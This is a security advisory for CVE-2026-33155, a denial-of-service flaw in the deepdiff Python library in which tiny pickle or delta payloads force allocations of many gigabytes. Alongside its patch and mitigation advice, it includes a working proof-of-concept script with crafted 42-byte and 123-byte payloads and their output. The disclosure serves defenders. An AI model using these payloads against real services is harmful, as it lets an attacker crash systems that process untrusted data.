CVE-2026-33155: deepdiff: memory-exhaustion DoS via small pickle payloads

GHSA-54jj-px8x-5w5q HIGH CISA: TRACK*
Published March 18, 2026
CISO Take

Upgrade deepdiff to 8.6.2 immediately if your team uses it in any Python application that processes untrusted input. A 40-byte payload can exhaust 10+ GB of memory, crashing any service that calls pickle_load or accepts delta objects from external sources. Audit every API endpoint, file upload handler, and message queue consumer that ingests deepdiff-serialized data — those are your highest-priority exposure points.

Risk Assessment

Medium-high for organizations using deepdiff in data-processing pipelines exposed to untrusted input. The amplification ratio (800,000x–2,000,000x) makes this a highly efficient DoS vector — an attacker can crash a service with trivial bandwidth. EPSS is currently low (0.042%), suggesting no active exploitation, but the PoC is public and the technique requires no AI/ML expertise. AI/ML teams routinely use deepdiff for model output diffing, dataset change tracking, and configuration comparison, often without sanitizing upstream data sources.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| deepdiff | pip | >= 5.0.0, <= 8.6.1 | 8.6.2 |

Do you use any deepdiff release from 5.0.0 through 8.6.1? You're affected.
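A quick way to check what is installed, using only the standard library (a minimal sketch; the helper name `deepdiff_version` is illustrative, and the 8.6.2 floor comes from the table above):

```python
# Minimal check for an installed deepdiff and its version (stdlib only).
from importlib import metadata

def deepdiff_version():
    """Return the installed deepdiff version string, or None if not installed."""
    try:
        return metadata.version("deepdiff")
    except metadata.PackageNotFoundError:
        return None

version = deepdiff_version()
if version is None:
    print("deepdiff is not installed")
else:
    print(f"deepdiff {version} is installed; the patched release is 8.6.2")
```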

Severity & Risk

CVSS 3.1: N/A
EPSS: 0.1% chance of exploitation in 30 days (higher than 23% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM (sophistication: trivial; confidence: medium)
CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. PATCH

    Upgrade deepdiff to >= 8.6.2; this is the only complete fix.

  2. AUDIT

    Grep your codebase for `pickle_load`, `Delta(`, and `deepdiff.serialization` to enumerate all ingestion points.

  3. ISOLATE

    If patching is not immediate, run deepdiff deserialization in a subprocess with memory limits (cgroups/ulimit) so a DoS payload cannot crash the host process.

  4. VALIDATE

    Add input size limits before passing data to pickle_load or Delta() — reject payloads above a reasonable threshold (e.g., 1 MB).

  5. DETECT

    Alert on OOM kills or sudden memory spikes in services that process serialized diff data.
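Step 3 (ISOLATE) can be sketched with the standard library alone: run the deserialization in a child Python process whose address space is capped with `resource.setrlimit`, so an amplification payload fails in the child instead of taking down the service. The helper name `run_limited` and the 1 GB cap are illustrative choices, not part of deepdiff, and `preexec_fn` is POSIX-only.

```python
# Sketch of step 3 (ISOLATE): run untrusted deserialization in a child process
# with a capped address space, so an amplification payload OOMs the child only.
import resource
import subprocess
import sys

def run_limited(code: str, max_mb: int = 1024) -> subprocess.CompletedProcess:
    """Run a Python snippet in a child process with an RLIMIT_AS cap (POSIX only)."""
    def cap_memory():
        limit = max_mb * 1024 * 1024
        resource.setrlimit(resource.RLIMIT_AS, (limit, limit))

    return subprocess.run(
        [sys.executable, "-c", code],
        preexec_fn=cap_memory,  # runs in the child before exec
        capture_output=True,
        timeout=30,
    )

# A ~2 GB allocation fails inside the capped child instead of exhausting the host:
result = run_limited("print(len(bytes(2 * 10**9)))")
print("child exit code:", result.returncode)  # nonzero means the child failed safely
```

In a real service the snippet passed to the child would call `pickle_load` on the untrusted bytes and return the result over a pipe; the cap ensures the worst case is a failed request, not a crashed host.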
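Step 4 (VALIDATE) amounts to one guard before deserialization. A minimal sketch, in which the helper name `check_payload_size` is illustrative and the 1 MB threshold mirrors the advisory's suggested default:

```python
# Sketch of step 4 (VALIDATE): reject oversized payloads before they reach
# pickle_load or Delta(). The 1 MB threshold mirrors the advisory's suggestion.
MAX_DELTA_BYTES = 1 * 1024 * 1024

def check_payload_size(payload: bytes, limit: int = MAX_DELTA_BYTES) -> bytes:
    """Return the payload unchanged, or raise ValueError if it exceeds the limit."""
    if len(payload) > limit:
        raise ValueError(f"payload is {len(payload)} bytes; limit is {limit}")
    return payload

# Usage (assuming deepdiff is installed):
#   from deepdiff.serialization import pickle_load
#   obj = pickle_load(check_payload_size(untrusted_bytes))
print(len(check_payload_size(b"small payload")))
```

Note that a size limit alone cannot block this particular attack, since the malicious payloads are only tens of bytes; it is defense in depth against bulkier abuse, which is why patching remains the only complete fix.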

CISA SSVC Assessment

Decision: Track*
Exploitation: poc
Automatable: Yes
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
6.1.2 - AI risk assessment
NIST AI RMF
GOVERN 1.2 - Accountability and risk management for AI systems
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2026-33155?

CVE-2026-33155 is a denial-of-service vulnerability in the deepdiff Python library (versions 5.0.0 through 8.6.1). The restricted unpickler used for delta deserialization validates which classes can be loaded but does not limit their constructor arguments, so a 40-byte pickle payload can force allocation of 10+ GB of memory, crashing any service that calls `pickle_load` or accepts delta objects from untrusted sources. The fix is to upgrade to deepdiff 8.6.2.

Is CVE-2026-33155 actively exploited?

No confirmed active exploitation of CVE-2026-33155 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-33155?

1. PATCH: Upgrade deepdiff to >= 8.6.2; this is the only complete fix. 2. AUDIT: Grep your codebase for `pickle_load`, `Delta(`, and `deepdiff.serialization` to enumerate all ingestion points. 3. ISOLATE: If patching is not immediate, run deepdiff deserialization in a subprocess with memory limits (cgroups/ulimit) so a DoS payload cannot crash the host process. 4. VALIDATE: Add input size limits before passing data to `pickle_load` or `Delta()`; reject payloads above a reasonable threshold (e.g., 1 MB). 5. DETECT: Alert on OOM kills or sudden memory spikes in services that process serialized diff data.

What systems are affected by CVE-2026-33155?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, data validation pipelines, CI/CD ML pipelines, agent frameworks.

What is the CVSS score for CVE-2026-33155?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

The pickle unpickler `_RestrictedUnpickler` validates which classes can be loaded but does not limit their constructor arguments. A few of the types in `SAFE_TO_IMPORT` have constructors that allocate memory proportional to their input (`builtins.bytes`, `builtins.list`, `builtins.range`). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call `pickle_load` with untrusted data.

### Details

CVE-2025-58367 hardened the delta class against pollution and remote code execution by converting `SAFE_TO_IMPORT` to a `frozenset` and blocking traversal. `_RestrictedUnpickler.find_class` only gates which classes can be loaded. It doesn't intercept `REDUCE` opcodes or validate what is passed to constructors. It can be exploited in two ways.

**1 - During `pickle_load`**

A pickle that calls `bytes(N)` using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override `load_reduce`, so any allowed class can be called.

```
GLOBAL builtins.bytes   (passes find_class check — serialization.py:353)
INT 10000000000         (10 billion)
TUPLE + REDUCE          → bytes(10**10) → allocates ~9.3 GB
```

**2 - During delta application**

A valid diff dict that first sets a value to a large int via `values_changed`, then converts it to bytes via `type_changes`. This works because `_do_values_changed()` runs before `_do_type_changes()` in `Delta.add()` in `delta.py` line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls `new_type(current_old_value)` at `delta.py` line 576 with no size guard.

### PoC

The script uses Python's `resource` module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change `10**8` to `10**10` for the full 9.3 GB allocation.

```python
import resource
import sys

def limit_memory(maxsize_mb):
    """Cap virtual memory for this process."""
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    maxsize_bytes = maxsize_mb * 1024 * 1024
    try:
        resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))
        print(f"[*] Memory limit set to {maxsize_mb} MB")
    except ValueError:
        print("[!] Failed to set memory limit.")
        sys.exit(1)

# Load heavy imports before enforcing the limit
from deepdiff import Delta
from deepdiff.serialization import pickle_dump, pickle_load

limit_memory(1024)

# --- Delta application path ---
payload_dict = {
    'values_changed': {"root['x']": {'new_value': 10**8}},
    'type_changes': {"root['x']": {'new_type': bytes}},
}
payload1 = pickle_dump(payload_dict)
print(f"Payload size: {len(payload1)} bytes")

target = {'x': 'anything'}
try:
    result = target + Delta(payload1)
    print(f"Allocated: {len(result['x']) // 1024 // 1024} MB")
    print(f"Amplification: {len(result['x']) // len(payload1)}x")
except MemoryError:
    print("[!] MemoryError — payload tried to allocate too much")

# --- Raw pickle path ---
payload2 = (
    b"(dp0\n"
    b"S'_'\n"
    b"cbuiltins\nbytes\n"
    b"(I100000000\n"
    b"tR"
    b"s."
)
print(f"Payload size: {len(payload2)} bytes")
try:
    result2 = pickle_load(payload2)
    print(f"Allocated: {len(result2['_']) // 1024 // 1024} MB")
except MemoryError:
    print("[!] MemoryError — payload tried to allocate too much")
```

Output:

```
[*] Memory limit set to 1024 MB
Payload size: 123 bytes
Allocated: 95 MB
Amplification: 813008x
Payload size: 42 bytes
Allocated: 95 MB
```

### Impact

Denial of service. Any application that deserializes delta objects or calls `pickle_load` with untrusted input can be crashed with a small payload. The restricted unpickler is meant to make this safe: it prevents remote code execution but doesn't prevent resource exhaustion. The amplification is large — 800,000x for delta and 2,000,000x for raw pickle.
Impacted users include anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.
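The raw-pickle path can be inspected safely with the standard library's `pickletools`, which disassembles the opcode stream without executing it. The payload bytes below are the ones from the description; the disassembly shows the GLOBAL/REDUCE sequence that `find_class` alone cannot block:

```python
# Disassemble the 42-byte raw-pickle payload from the description with
# pickletools (which never executes the pickle, so this is safe to run).
import pickletools

payload = (
    b"(dp0\n"
    b"S'_'\n"
    b"cbuiltins\nbytes\n"
    b"(I100000000\n"
    b"tR"
    b"s."
)
print(f"{len(payload)} bytes")
pickletools.dis(payload)  # prints the GLOBAL, INT, TUPLE, REDUCE opcode sequence
```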

Exploitation Scenario

An adversary submits a malicious serialized deepdiff delta to a model comparison API that accepts untrusted payloads (e.g., a collaborative ML platform or CI pipeline). The payload uses `values_changed` to set a value to 10^8, then `type_changes` to convert it to `bytes`, exploiting the fixed execution order in Delta.add(). When the API deserializes the delta, `bytes(10**8)` allocates ~95 MB per request. With concurrent requests, the service exhausts available memory and crashes — no authentication required if the endpoint accepts external uploads. Alternatively, the raw pickle path requires just a 42-byte payload with 2,000,000x amplification.

Timeline

Published
March 18, 2026
Last Modified
March 20, 2026
First Seen
March 24, 2026

Related Vulnerabilities